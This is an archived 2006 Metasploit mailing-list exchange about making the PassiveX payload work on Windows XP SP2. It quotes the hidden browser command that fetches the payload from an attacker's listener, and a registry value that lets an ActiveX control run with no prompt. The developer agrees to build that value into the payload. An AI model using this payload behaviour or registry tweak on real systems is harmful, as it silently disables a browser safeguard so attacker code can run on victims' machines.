Metasploit mailing list archives

Using the PassiveX payload

From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 5 May 2006 11:32:11 -0500

On Fri, May 05, 2006 at 06:18:44PM +0200, Feature Meister wrote:
Hi,

the dll does not get downloaded into %WINDIR%\Downloaded Program Files.
After some more troubleshooting and debugging (with process explorer)
I found out that the hidden IE is started with "...\iexplore.exe -new
http://192.168.71.75:8000/.
So I tried this one from a regular command line.
Result: IE prevented an ActiveX Control from being loaded and executed
automatically. Instead  I was presented with a pop-up and the usual IE
information bar.
I then looked at the security settings of Internet-Zone. Besides
"Automatic prompting for ActiveX controls" everythin was set so that
the control would execute without asking.
However the above setting was set to "Disable". I changed it to
"Enable" according to the helpful help dialog ;-) and tried it again:
it works!
The required setting in
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3 would be:

"2201"=dword:00000000

probably this could be added to the actual exploit code?

Yeah, this sounds like another registry value we need to add to make it
work properly in XPSP2.  Thanks for the info!  We'll look at adding this
in a future version of the payload.  Should only increase the size by
four bytes.